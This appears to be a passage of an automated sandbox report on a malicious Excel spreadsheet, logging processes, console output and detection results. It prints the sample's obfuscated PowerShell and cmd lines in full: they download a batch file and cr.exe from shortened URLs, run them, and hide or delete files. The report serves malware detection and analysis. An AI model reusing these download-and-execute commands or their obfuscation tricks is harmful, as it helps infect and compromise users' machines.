      Source: C:\Windows\System32\cmd.exeConsole Write: ................................). ......................................\Q........J.............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: .................................................D$......................\Q.....x................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................................`{.J....................i^Q......$.J..............$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................".6...1.". .=.=. .".6...2.". ............\Q.....i.f. ............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................(................D$.............................x...............d1.......".v...............................J....Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: .........................................................................\Q.....(................D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................e.c.h.o.........}..v....................|.......................................................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ .".W.i.n.d.o.w.s. .8. .d.e.t.e.c.t.e.d.". . ...e.c.h.o..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... ..........D$......................\Q.....x................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................r.e.g...........}..v....................|...............$....................................... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................]Q.....r.e.g............D$...............$.............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................]Q......................D$.............8...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................]Q......................D$.............8...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|...............F.......................8............... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ./.t. .2. . ............................]Q.....t.i.m.e..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>.....................................9]Q..... ./.t. ..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. .................................9]Q..... ./.t. ..........D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................ ..... .........d1.......................]Q......................D$.............8...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................s.c.h.t.a.s.k.s.}..v....................|....................................................... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$.....................................................................i]Q.....s.c.h.t..........D$...............$.....v.......................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................1.>......................................^Q......................D$.............x...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................n.u.l. ..................................^Q......................D$.............x...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................t.i.m.e.o.u.t...}..v....................|.......................................x............... ..... .........Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D...............). ......................................\Q........J.............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................D................................D$......................\Q.....x................D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................i.f. ...........`{.J.....................\Q.....X%.J.............D$.............................................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................".6...1.". .=.=. .".6...1.". ............\Q.....i.f. ............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................C.m.d...........................................(................D$.............X...............x...............Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ..$......................................................................\Q.....C.m.d............D$...............$.....j.......................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ................................). ..............D$......................\Q.......$..............D$.............X...............................Jump to behavior
      Source: C:\Windows\System32\cmd.exeConsole Write: ...................J............T.h.e. .b.a.t.c.h. .f.i.l.e. .c.a.n.n.o.t. .b.e. .f.o.u.n.d............. ...............B.......................Jump to behavior
      Source: C:\Users\user\AppData\Roaming\cr.exeCommand line argument: nkF24_2_00466AC0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\AppData\Roaming\cr.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: ul9kpUwYel.xlsVirustotal: Detection: 41%
      Source: ul9kpUwYel.xlsMetadefender: Detection: 22%
      Source: ul9kpUwYel.xlsReversingLabs: Detection: 34%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknownProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
      Source: unknownProcess created: C:\Windows\System32\mode.com mode 18,1
      Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: unknownProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: unknownProcess created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 18,1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe'
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000007.00000002.2145478746.0000000002AA0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2164368901.0000000002A50000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2153405530.000000001B420000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2189543252.00000000028F0000.00000002.00000001.sdmp

      Data Obfuscation:

      Obfuscated command line found
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: unknownProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c powershe^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Suspicious powershell command line found
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,24_2_00423778
      Source: sqlite3.dll.24.drStatic PE information: section name: /4
      Source: sqlite3.dll.24.drStatic PE information: section name: /19
      Source: sqlite3.dll.24.drStatic PE information: section name: /31
      Source: sqlite3.dll.24.drStatic PE information: section name: /45
      Source: sqlite3.dll.24.drStatic PE information: section name: /57
      Source: sqlite3.dll.24.drStatic PE information: section name: /70
      Source: sqlite3.dll.24.drStatic PE information: section name: /81
      Source: sqlite3.dll.24.drStatic PE information: section name: /92
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00467460 push eax; ret 24_2_0046747E
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_004674C1 push eax; ret 24_2_004674B6
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00467480 push eax; ret 24_2_004674B6
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FA71 push ecx; ret 24_2_0043FA84
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FC66 push ecx; ret 24_2_0043FC79
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0046FED8 pushad ; retf 0046h24_2_0046FEE1
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00222AA1 push es; retf 24_2_00222AA5
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0022502A push esi; ret 24_2_0022502E
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00223605 push 00000004h; iretd 24_2_0022360C
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00223E89 push eax; retf 24_2_00223E8A
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002D76B0 push eax; ret 24_2_002D76CE
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002D76D0 push eax; ret 24_2_002D7706
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002AFCC1 push ecx; ret 24_2_002AFCD4
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_047F350A push ss; iretd 24_2_047F3624
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_047F312B push ss; ret 24_2_047F3135
      Source: initial sampleStatic PE information: section name: UPX0
      Source: initial sampleStatic PE information: section name: UPX1

      Persistence and Installation Behavior:

      Tries to download and execute files (via powershell)
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\cr.exe
      Source: C:\Users\user\AppData\Roaming\cr.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dll
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043ED22 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,24_2_0043ED22
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exe, Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
